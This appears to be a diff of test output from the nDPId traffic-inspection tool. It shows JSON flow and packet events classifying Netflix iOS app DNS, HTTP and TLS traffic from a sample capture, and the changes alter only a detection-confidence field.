00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":895,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1484319049672,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319049672,"pkt":"gCqoTGHM5JjWH70UCABFAABAS8NAAEAGqRPAqAEHuBnMGM+hAFBgKjK0AAAAALAC\/\/92\/gAAAgQFtAEDAwUBAQgKH2T36AAAAAAEAgAA"} 00878{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":896,"source":"netflix.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1484319049681,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":371,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":371,"pkt_l4_len":337,"thread_ts_msec":1484319049681,"pkt":"5JjWH70UgCqoTGHMCABFAAFl4UhAAEAR1ObAqAEBwKgBBwA1zHsBUaLnX+eBgAABAAoAAAAAA2lvcwRuY2NwB25ldGZsaXgDY29tAAAcAAHADAAFAAEAAABiAA8DaW9zBG5jY3ADZ2VvwBXAMgAFAAEAAAFYABwDaW9zBG5jY3AJdXMtd2VzdC0yBnByb2RhYcAVwE0AHAABAAAAFwAQJiABCHAPAAAAAAAANChyo8BNABwAAQAAABcAECYgAQhwDwAAAAAAADQoMS\/ATQAcAAEAAAAXABAmIAEIcA8AAAAAAAA0KQT4wE0AHAABAAAAFwAQJiABCHAPAAAAAAAANCk7ncBNABwAAQAAABcAECYgAQhwDwAAAAAAADQnRIjATQAcAAEAAAAXABAmIAEIcA8AAAAAAAA0KBwAwE0AHAABAAAAFwAQJiABCHAPAAAAAAAANCh7ccBNABwAAQAAABcAECYgAQhwDwAAAAAAADQoNhw="} -00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":896,"source":"netflix.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319049645,"flow_last_seen":1484319049681,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":367,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1484319049681,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52347,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":1,"num_answers":10,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"38.32.1.8"}} +00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":896,"source":"netflix.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319049645,"flow_last_seen":1484319049681,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":367,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1484319049681,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52347,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":1,"num_answers":10,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"38.32.1.8"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":897,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049684,"flow_last_seen":1484319049684,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319049684,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":897,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1484319049684,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319049684,"pkt":"gCqoTGHM5JjWH70UCABFAABAHF1AAEAGFLrAqAEHNr8RM8+qAbupwyRaAAAAALAC\/\/92fwAAAgQFtAEDAwUBAQgKH2T39AAAAAAEAgAA"} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":898,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1484319049697,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319049697,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADwG+Lq4GcwYwKgBBwBQz6GV0BcIYCoytaAScSDlwwAAAgQFtAQCCAr\/\/IQ4H2T36AEDAwU="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":900,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1484319049700,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319049700,"pkt":"gCqoTGHM5JjWH70UCABFAAA0bmdAAEAGhnvAqAEHuBnMGM+hAFBgKjK1ldAXCYAQEBV1gAAAAQEICh9k+AH\/\/IQ4"} -00824{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":902,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319049672,"flow_last_seen":1484319049703,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1484319049703,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.24","src_port":53153,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"tp.akam.nflximg.com","url":"tp.akam.nflximg.com\/tpa3\/616\/2041779616.bif","code":0,"content_type":"","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}} +00824{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":902,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319049672,"flow_last_seen":1484319049703,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1484319049703,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.24","src_port":53153,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"tp.akam.nflximg.com","url":"tp.akam.nflximg.com\/tpa3\/616\/2041779616.bif","code":0,"content_type":"","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":908,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1484319049740,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319049740,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGRvs2vxEzwKgBBwG7z6pwpjzKqcMkW6ASOJCp2gAAAgQFtAQCCAqtikoKH2T39AEDAwg="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":910,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1484319049743,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319049743,"pkt":"gCqoTGHM5JjWH70UCABFAAA0ddRAAEAGu07AqAEHNr8RM8+qAbupwyRbcKY8y4AQEBUA7QAAAQEICh9k+CqtikoK"} -00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":912,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319049684,"flow_last_seen":1484319049748,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319049748,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00976{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":913,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319049672,"flow_last_seen":1484319049753,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1484319049753,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.24","src_port":53153,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"25": {"risk":"HTTP Suspicious Content","severity":"High","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"tp.akam.nflximg.com","url":"tp.akam.nflximg.com\/tpa3\/616\/2041779616.bif","code":200,"content_type":"text\/plain","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}} -01018{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":920,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319049684,"flow_last_seen":1484319049807,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319049807,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01358{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":923,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319049684,"flow_last_seen":1484319049850,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319049850,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} +00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":912,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319049684,"flow_last_seen":1484319049748,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319049748,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00976{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":913,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319049672,"flow_last_seen":1484319049753,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1484319049753,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.24","src_port":53153,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"25": {"risk":"HTTP Suspicious Content","severity":"High","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"tp.akam.nflximg.com","url":"tp.akam.nflximg.com\/tpa3\/616\/2041779616.bif","code":200,"content_type":"text\/plain","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}} +01018{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":920,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319049684,"flow_last_seen":1484319049807,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319049807,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01358{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":923,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319049684,"flow_last_seen":1484319049850,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319049850,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":968,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319050652,"flow_last_seen":1484319050652,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319050652,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.145","src_port":53163,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":968,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1484319050652,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319050652,"pkt":"gCqoTGHM5JjWH70UCABFAABA2xBAAEAGenHAqAEHF\/YLkc+rAFC8XkCtAAAAALAC\/\/9pzAAAAgQFtAEDAwUBAQgKH2T7jgAAAAAEAgAA"} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":970,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1484319050677,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319050677,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmYX9guRwKgBBwBQz6susPTdvF5ArqAS\/\/\/2WQAAAgQFtAEDAwkEAggKRVwbeB9k+44="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":971,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1484319050678,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319050678,"pkt":"gCqoTGHM5JjWH70UCABFAAA0kSxAAEAGxGHAqAEHF\/YLkc+rAFC8XkCuLrD03oAQEBUU+gAAAQEICh9k+6dFXBt4"} -01128{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":972,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319050652,"flow_last_seen":1484319050682,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319050682,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.145","src_port":53163,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.145","url":"23.246.11.145\/range\/0-65535?o=AQEfKq2oMrLRiWL-p-VeIZ6WKRq-X6LMvaLqgxWBCuFbh09MpreORUUOO5Tx1683HPnLY6BPjN_9mlDuYihGZoXu9u0ozH8RFioBN_JDNiRscidjvoSdWmlyZgPNansW0lkBr4X81HvloOi8BS_exVSPhMyJQTB5bg&v=3&e=1484347850&t=5xfYVtna3GdYXL71uNs6DZ-X84Y&random=3930708224","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +01128{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":972,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319050652,"flow_last_seen":1484319050682,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319050682,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.145","src_port":53163,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.145","url":"23.246.11.145\/range\/0-65535?o=AQEfKq2oMrLRiWL-p-VeIZ6WKRq-X6LMvaLqgxWBCuFbh09MpreORUUOO5Tx1683HPnLY6BPjN_9mlDuYihGZoXu9u0ozH8RFioBN_JDNiRscidjvoSdWmlyZgPNansW0lkBr4X81HvloOi8BS_exVSPhMyJQTB5bg&v=3&e=1484347850&t=5xfYVtna3GdYXL71uNs6DZ-X84Y&random=3930708224","code":0,"content_type":"","user_agent":"netflix-ios-app"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1027,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319052216,"flow_last_seen":1484319052216,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319052216,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.10.139","src_port":53164,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1027,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1484319052216,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319052216,"pkt":"gCqoTGHM5JjWH70UCABFAABAN3hAAEAGHxDAqAEHF\/YKi8+sAFBgdy0VAAAAALAC\/\/\/UZQAAAgQFtAEDAwUBAQgKH2UBeQAAAAAEAgAA"} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1031,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1484319052235,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319052235,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGW2wX9gqLwKgBBwBQz6xlmlqWYHctFqAS\/\/8JBgAAAgQFtAEDAwkEAggKQI7bkB9lAXk="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1032,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1484319052237,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319052237,"pkt":"gCqoTGHM5JjWH70UCABFAAA0JFZAAEAGMj7AqAEHF\/YKi8+sAFBgdy0WZZpal4AQEBUnrAAAAQEICh9lAYxAjtuQ"} -01129{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1033,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319052216,"flow_last_seen":1484319052242,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319052242,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.10.139","src_port":53164,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.10.139","url":"23.246.10.139\/range\/0-65535?o=AQEfKq2oMrLRiWL-p-VeIZ6WKRq-X6LMvaLqgxWBCuFbh09MpreORUUOO5Tx1683HPnLY6BPjN_9mlDuYihGZoXu9u0ozH8RFioBN_JDNiRscidjvoSdWmlyZgPNansW0lkBr4X81HvloOi8BS_exVSPhMyJQTB5bg&v=3&e=1484347850&t=-djGXIcbFBNzyfugqEWcrgtCpyY&random=3407360776","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +01129{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1033,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319052216,"flow_last_seen":1484319052242,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319052242,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.10.139","src_port":53164,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.10.139","url":"23.246.10.139\/range\/0-65535?o=AQEfKq2oMrLRiWL-p-VeIZ6WKRq-X6LMvaLqgxWBCuFbh09MpreORUUOO5Tx1683HPnLY6BPjN_9mlDuYihGZoXu9u0ozH8RFioBN_JDNiRscidjvoSdWmlyZgPNansW0lkBr4X81HvloOi8BS_exVSPhMyJQTB5bg&v=3&e=1484347850&t=-djGXIcbFBNzyfugqEWcrgtCpyY&random=3407360776","code":0,"content_type":"","user_agent":"netflix-ios-app"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1100,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319054101,"flow_last_seen":1484319054101,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319054101,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53171,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 